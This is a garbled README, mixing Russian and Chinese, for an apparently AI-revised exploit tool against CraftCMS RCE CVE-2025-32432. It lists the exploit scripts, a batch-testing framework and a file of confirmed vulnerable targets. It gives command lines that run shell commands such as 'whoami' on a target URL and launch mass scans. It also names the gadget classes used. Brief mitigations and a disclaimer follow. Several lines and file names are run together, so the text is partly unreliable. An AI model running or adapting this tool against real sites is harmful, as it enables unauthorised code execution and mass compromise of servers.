
AI-исправленный poc для CVE-2025-32432
Инструмент эксплуатации уязвимости удалённого выполнения кода (RCE) в CraftCMS, основанный на исследовании SensePost.
final_poc.py - финально оптимизированный POC
test.py - упрощённая версия на основе оригинальной статьи SensePost
yii\rbac\PhpManagerautomated_testing.py - фреймворк автоматизированного тестирования
exploit_summary.md - сводка анализа уязвимостиtest_results.json - результаты автоматизированного тестированияvulnerable.txt - список целей с подтверждённой уязвимостью# 基本POC测试
python3 final_poc.py https://target.com/ id
# 调试模式
python3 final_poc.py https://target.com/ "whoami" --debug
# 简化版本
python3 test.py https://target.com/ "ls -la"
# 创建目标文件
python3 automated_testing.py --create-targets
# 运行批量测试
python3 automated_testing.py
phpinfo() через GuzzleHttp\Psr7\FnStreamyii\rbac\PhpManagerОбновите CraftCMS до исправленной версии:
Включите Site Lock для защиты панели admin
Ограничьте права доступа к session-файлам
Разверните правила WAF для обнаружения вредоносных payload
Этот инструмент предназначен только для исследований в области безопасности и авторизованного тестирования на проникновение. Пользователи обязаны соблюдать местные законы и нормативные акты и не должны использовать его в незаконных целях.